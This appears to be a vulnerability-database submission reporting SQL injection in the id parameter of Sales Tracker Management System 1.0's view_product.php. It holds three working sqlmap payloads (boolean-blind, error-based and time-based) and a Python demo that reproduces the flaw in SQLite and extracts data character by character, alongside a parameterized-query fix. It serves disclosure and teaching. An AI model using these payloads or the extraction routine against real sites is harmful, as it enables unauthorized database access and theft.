| Title | Authenticated SQL Injection on Sales Tracker System When View Products |
|---|
| Description | # Exploit Title: Authenticated SQL Injection on Sales Tracker System When View Products (admin/products/view_product.php, `id` parameter)
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# Tested on: Windows 11
# Detailed write-up: http://ahmedismailozil.blogspot.com/
```
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' AND 3751=3751-- vKjv
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' OR (SELECT 4094 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(4094=4094,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- iMtv
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' AND (SELECT 1697 FROM (SELECT(SLEEP(5)))HGvM)-- EEHf
---
[09:57:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
``` |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html |
|---|
| User | mroz1l (UID 41497) |
|---|
| Submission | 02/23/2023 07:25 (3 years ago) |
|---|
| Moderation | 02/23/2023 16:14 (9 hours later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 221634 [SourceCodester Sales Tracker Management System 1.0 view_product.php ID sql injection] |
|---|
| Points | 0 |
|---|
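The three sqlmap payloads above all exploit the same root cause: the `id` query-string value lands inside a single-quoted string literal in the SQL sent by `view_product.php`, so a leading `'` closes the literal and `-- ` comments out the rest. The page does not show the PHP source, so the following is an added example (not the project's code and not from the submitter) that reproduces the vulnerable query-building pattern in Python against an in-memory SQLite database, drives the boolean-based blind technique end to end, and contrasts it with a parameterized query. The table layout, the sample rows and the exact query text are assumptions; `unicode()`/`substr()` are the SQLite equivalents of MySQL's `ASCII()`/`SUBSTRING()`, and the error-based and time-based payloads (which rely on MySQL's `FLOOR(RAND())` and `SLEEP()`) are not simulated.

```python
import sqlite3

# Constructed sample schema standing in for the application's tables (assumption;
# the real Sales Tracker schema is not shown on the page).
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO products VALUES (5, 'Widget');
INSERT INTO users VALUES (1, 'admin', 'not-a-real-hash');
"""


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_product_vulnerable(conn, product_id):
    """Hypothetical equivalent of the vulnerable view_product.php lookup: the raw
    `id` parameter is interpolated into a quoted literal, so a payload such as
    5' AND 3751=3751-- vKjv becomes part of the SQL grammar."""
    sql = f"SELECT id, name FROM products WHERE id = '{product_id}'"
    return conn.execute(sql).fetchone()


def view_product_fixed(conn, product_id):
    """Hardened form: the value is bound as a parameter and is only ever data."""
    return conn.execute(
        "SELECT id, name FROM products WHERE id = ?", (product_id,)
    ).fetchone()


def oracle(conn, condition):
    """Boolean-based blind oracle in the shape of sqlmap's first payload:
    the product row comes back only when the injected condition is true."""
    payload = f"5' AND ({condition})-- "
    return view_product_vulnerable(conn, payload) is not None


def extract_string(conn, subquery, max_len=64):
    """Recover the result of an arbitrary scalar subquery one character at a time
    using nothing but the yes/no oracle. A binary search over the code point costs
    about seven requests per character instead of one per candidate byte."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop once the position runs past the end of the string.
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 1, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite: unicode(substr(...)); on MySQL this would be ASCII(SUBSTRING(...)).
            if oracle(conn, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = new_db()
    print("true payload :", view_product_vulnerable(db, "5' AND 3751=3751-- vKjv"))
    print("false payload:", view_product_vulnerable(db, "5' AND 3751=3752-- vKjv"))
    print("extracted    :", extract_string(db, "SELECT username FROM users WHERE id = 1"))
    print("parameterized:", view_product_fixed(db, "5' AND 3751=3751-- vKjv"))
```

Running it shows the asymmetry sqlmap relies on: the `3751=3751` variant returns the product row, the `3751=3752` variant returns nothing, and that single bit is enough to pull `admin` out of the `users` table. The parameterized lookup returns no row for the same payload because the whole string is compared against `id` as a value, which is the fix to apply in `view_product.php` (PDO or mysqli prepared statements) rather than trying to filter quotes.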